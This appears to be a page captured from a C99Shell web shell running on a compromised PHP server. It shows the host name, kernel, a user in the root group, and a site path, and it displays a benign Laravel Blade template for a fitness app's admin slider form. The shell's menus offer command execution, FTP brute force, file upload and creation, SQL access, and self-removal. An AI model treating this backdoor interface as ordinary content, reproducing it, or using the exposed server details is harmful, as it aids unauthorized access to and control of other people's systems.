!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/fitness.picotech.app/public_html/resources/views/admin/step/partial/   drwxr-xr-x
Free 22.5 GB of 117.98 GB (19.07%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     design_two.blade.php (5.18 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@php

$slider_details=$slider_details;
$slider_detail=isset($slider_details[0])?json_decode($slider_details[0]->value):'';

@endphp


<div class="row">
    <div class="col-md-12 slider-section">
        <div class="card">
            <div class="card-header">
                <h5>Slider Section</h5>
            </div>
            <div class="card-body">
                <div class="row">
                    <div class="form-group col-md-6">
                        <label for="">{{trans('Title')}} <span class="text-danger">*</span></label>
                        <input type="text" class="form-control" value="{{isset($slider_detail->title)?$slider_detail->title:''}}" name="slider_title[]">
                    </div>

                    <div class="form-group col-md-6">
                        <label for="">{{trans('Value')}}</label>
                        <input type="text" class="form-control" value="{{isset($slider_detail->value)?$slider_detail->value:''}}" name="slider_value[]">
                    </div>

                    <div class="form-group col-md-6 mt-3">
                        <label for="">{{trans('Text Title')}}</label>
                        <input type="text" class="form-control" value="{{isset($slider_detail->text_title)?$slider_detail->text_title:''}}" name="text_title[]">
                    </div>

                    <div class="form-group col-md-6 mt-3">
                        <label for="">{{trans('Text Description')}}</label>
                        <input type="text" class="form-control" value="{{isset($slider_detail->text_description)?$slider_detail->text_description:''}}" name="text_description[]">
                    </div>

                    <div class="form-group col-md-12 {{isset($step) && $step->design=='design_eight'?'d-none':''}}">
                        <label for="">{{trans('Image')}}</label>
                        @if(isset($slider_detail->image) && $slider_detail->image && file_exists( public_path().'/uploads/'.$slider_detail->image))
                        <input type="hidden" class="form-control p-1" value="{{$slider_detail->image}}"  name="pre_slider_image[]">
                        @endif

                        <input type="file" class="form-control p-1" name="slider_image[]">
                    </div>

                </div>

                <div class="form-group text-right justify-content-end">
                    <button class="btn btn-success btn-sm add_slider" type="button">
                        <i class="fa fa-plus"></i>
                    </button>
                </div>

            </div>
        </div>


        @if(isset($step) && $step->step_details)
        @php $slider_step_counter=9999; @endphp
            @foreach ($slider_details as $key=>$s_detail)
            @if($key !='0')
            @php $slider_step_counter++; $values=$s_detail->value?json_decode($s_detail->value):''; @endphp
            <div class="card mt-2" id="slider_append_{{$slider_step_counter}}">
                <div class="card-body">
                    <button class="btn-danger btn-sm float-right delete_slider_append" data-id="{{$slider_step_counter}}" type="button">  <i class="fa fa-trash"></i>  </button>
                    <div class="row">
                        <div class="form-group col-md-6">
                            <label for="">{{trans('Title')}} <span class="text-danger">*</span></label>
                            <input type="text" class="form-control" value="{{isset($values->title)?$values->title:''}}" name="slider_title[]">
                        </div>

                        <div class="form-group col-md-6">
                             <label for="">{{trans('Value')}}</label>
                             <input type="text" class="form-control" value="{{isset($values->value)?$values->value:''}}" name="slider_value[]">
                        </div>

                        <div class="form-group col-md-6 mt-3">
                            <label for="">{{trans('Text Title')}}</label>
                            <input type="text" class="form-control" value="{{isset($values->text_title)?$values->text_title:''}}" name="text_title[]">
                        </div>

                        <div class="form-group col-md-6 mt-3">
                            <label for="">{{trans('Text Description')}}</label>
                            <input type="text" class="form-control" value="{{isset($values->text_description)?$values->text_description:''}}" name="text_description[]">
                        </div>

                        <div class="form-group col-md-12 {{isset($step) && $step->design=='design_eight'?'d-none':''}}">
                            <label for="">{{trans('Image')}}</label>
                            @if(isset($values->image) && $values->image && file_exists( public_path().'/uploads/'.$values->image))
                            <input type="hidden" class="form-control p-1" value="{{$values->image}}" name="pre_slider_image[]">
                            @endif

                            <input type="file" class="form-control p-1" name="slider_image[]">
                        </div>
                    </div>
                </div>
            </div>
            @endif
            @endforeach
        @endif
    </div>
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--